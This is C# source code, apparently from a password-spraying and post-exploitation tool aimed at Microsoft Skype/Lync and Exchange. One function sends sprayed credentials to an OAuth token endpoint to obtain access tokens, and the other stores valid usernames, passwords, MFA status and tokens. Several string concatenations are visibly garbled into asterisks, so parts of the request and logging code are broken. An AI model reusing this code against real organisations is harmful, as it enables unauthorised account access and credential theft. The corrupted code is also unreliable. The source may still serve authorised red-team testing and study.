public static Boolean PreEmptOAuthPostExploit(CredentialsRecord record, List <ServiceInterface> serviceInterfaces, MainWindow UI, ObservableCollection <Hostnames> enumeratedHostnames)
        {
            if (record.Token != "" && record.Token != null)
            {
                return(true);
            }
            else
            {
                ServiceInterface serviceInterface = getOrCreateServiceInterface(serviceInterfaces, UI, enumeratedHostnames);
                if (serviceInterface != null)
                {
                    //So basically - we need to auth to the REAL SKYPE interface AUTH ENDPOINT - IF it is oauth - and get the token - add it to this record and change the record's service to Skype
                    //THIS IS THEN ONE ALREADY SET UP - REAL LYNC ETC - SO JUST GO - WITH NEW USERNAME LIST


                    //Check it is not an NTLM endpoint or such for Skype
                    if (serviceInterface.host.SprayURL.Url != "" && serviceInterface.host.SprayURL.Url != null)
                    {
                        if (serviceInterface.host.SprayURL.Url.Contains("oauthtoken"))
                        {
                            //This CAN BE either legacy or modern format - so just go with what we have as known valid
                            //Only causes issue with legacy here if user is invalid = v slow
                            string domainUser = record.Username;
                            UI.ThreadSafeAppendLog("[4]Record username in required format: " + domainUser);

                            string postData = "grant_type=password&username="******"&password="******"application/x-www-form-urlencoded";
                            request.UserAgent   = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0";
                            request.Method      = "POST";
                            var data = Encoding.ASCII.GetBytes(postData);
                            request.ContentLength = data.Length;

                            try
                            {
                                using (var stream = request.GetRequestStream())
                                {
                                    stream.Write(data, 0, data.Length);
                                }
                                var response       = (HttpWebResponse)request.GetResponse();
                                var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
                                response.Close();
                                UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString);

                                if (responseString.Contains("access_token"))
                                {
                                    //Add access token to existing record

                                    Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString);
                                    if (accessTokenMatch.Success)
                                    {
                                        string accessToken = accessTokenMatch.Value;
                                        record.Token   = accessToken;
                                        record.Service = MicrosoftService.Skype;
                                        UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token.");
                                        return(false);
                                    }
                                }
                            }
                            catch (WebException webException3)
                            {
                                HttpWebResponse response = webException3.Response as HttpWebResponse;
                                try
                                {
                                    var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
                                    UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString);
                                    if (responseString.Contains("access_token"))
                                    {
                                        Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString);
                                        if (accessTokenMatch.Success)
                                        {
                                            string accessToken = accessTokenMatch.Value;
                                            record.Token   = accessToken;
                                            record.Service = MicrosoftService.Skype;
                                            UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token.");
                                            return(false);
                                        }
                                    }
                                    else if (responseString.Contains("Bad Request"))
                                    {
                                        UI.ThreadSafeAppendLog("[1]Valid credentials found - User not SIP enabled or similar: " + record.Username);
                                        return(false);
                                    }
                                }
                                catch (Exception esdf)
                                {
                                    UI.ThreadSafeAppendLog("[1]Exception: " + esdf.ToString());
                                    return(false);
                                }
                            }
                            catch (Exception ex)
                            {
                                UI.ThreadSafeAppendLog("[1]Exception: " + ex.ToString());
                                return(false);
                            }
                        }
                        else
                        {
                            UI.ThreadSafeAppendLog("[1]Oauth URL not found for Skype host - perhaps the password spray URL is NTLM authentication or other...");
                            return(false);
                        }
                    }
                    else
                    {
                        UI.ThreadSafeAppendLog("[1]No valid authentication URL...");
                        return(false);
                    }
                }
                else
                {
                    UI.ThreadSafeAppendLog("[1]No valid Skype host for authenticaton...");
                    return(false);
                }
            }
            return(false);
        }
        public static void Add(CredentialsRecord record, ObservableCollection <CredentialsRecord> accessTokens, MainWindow UI, MicrosoftService service)
        {
            try
            {
                //Will these count as same object? Might have matching properties - but created in two separate places - might need to match on values
                App.Current.Dispatcher.Invoke((Action) delegate
                {
                    //Unlock EnumerateUsers for PassSpray - as this is just definitely adding a user
                    MainWindow.SetDoWeHaveEnumeratedUsers(true);
                    if (record.Password != "" && record.Password != null)
                    {
                        MainWindow.SetDoWeHaveAnyUserAndPass(true);
                    }
                    //If record already exists with same username - grab that record and update as necessary
                    if (accessTokens.Any(p => p.Username == record.Username))
                    {
                        int changed = 0;
                        //SHOULD ONLY BE ONE RECORD WITH MATCHING USERNAME
                        IEnumerable <CredentialsRecord> alreadyExists = accessTokens.Where(x => x.Username == record.Username);
                        CredentialsRecord updateMe = alreadyExists.First();
                        //If the record we are trying to add has a password - get the existing record with matching username
                        //These are just updating all if record has it - then saving - not actually checking that it doesn't match what's already in
                        if (record.Password != null && record.Password != "")
                        {
                            //JUST UPDATE PASSWORD - EITHER WILL BE SAME OR WE'VE FOUND IT CHANGED NOW
                            updateMe.Password = record.Password;
                            changed++;
                        }
                        if (record.MFA != null && record.MFA != "")
                        {
                            updateMe.MFA = record.MFA;
                            changed++;
                        }
                        if (record.PasswordExpired != null && record.PasswordExpired != "")
                        {
                            updateMe.PasswordExpired = record.PasswordExpired;
                            changed++;
                        }
                        if (record.ServerError != null && record.ServerError != "")
                        {
                            updateMe.ServerError = record.ServerError;
                            changed++;
                        }
                        if (record.AccountDisabled != null && record.AccountDisabled != "")
                        {
                            updateMe.AccountDisabled = record.AccountDisabled;
                            changed++;
                        }
                        if (record.SipEnabled != null && record.SipEnabled != "")
                        {
                            updateMe.SipEnabled = record.SipEnabled;
                            changed++;
                        }
                        //UPDATE RECORD TO BE SERVICE WE LAST HIT - IF WE ENUMMED IN EXCHANGE - THEN SPRAYED IN LYNC AND GOT PASSWORD
                        //IS NOW LYNC
                        if (updateMe.Service != record.Service)
                        {
                            updateMe.Service = record.Service;
                            changed++;
                        }

                        //I don't fully know why this checks for record.password as well? Might have had a reason? Though also - no harm? Can't think how
                        //I'd get a new token with no password?
                        if (record.Token != null && record.Password != "")
                        {
                            updateMe.Token = record.Token;
                            changed++;
                        }

                        if (changed > 0)
                        {
                            UI.saveValidUsersAndCreds(null, SaveType.autoLog);
                        }
                    }
                    else
                    {
                        accessTokens.Add(record);
                        UI.saveValidUsersAndCreds(null, SaveType.autoLog);
                    }
                });
            }
            catch (Exception e)
            {
            }
        }